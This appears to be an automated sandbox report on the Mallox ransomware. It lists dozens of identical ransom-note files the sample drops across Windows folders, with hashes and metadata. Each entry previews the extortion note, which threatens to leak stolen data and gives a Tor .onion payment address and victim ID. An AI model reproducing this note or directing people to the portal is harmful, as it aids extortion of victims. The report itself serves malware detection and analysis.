                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Defender Advanced Threat Protection\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Media Player\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Media Player\Media Renderer\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Media Player\Network Sharing\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Media Player\Skins\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Media Player\Visualizations\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Media Player\en-GB\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Media Player\en-US\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Multimedia Platform\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Security\BrowserCore\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Security\BrowserCore\en-US\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Security\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\ProgramData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\ProgramData\Microsoft\Windows\Start Menu\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
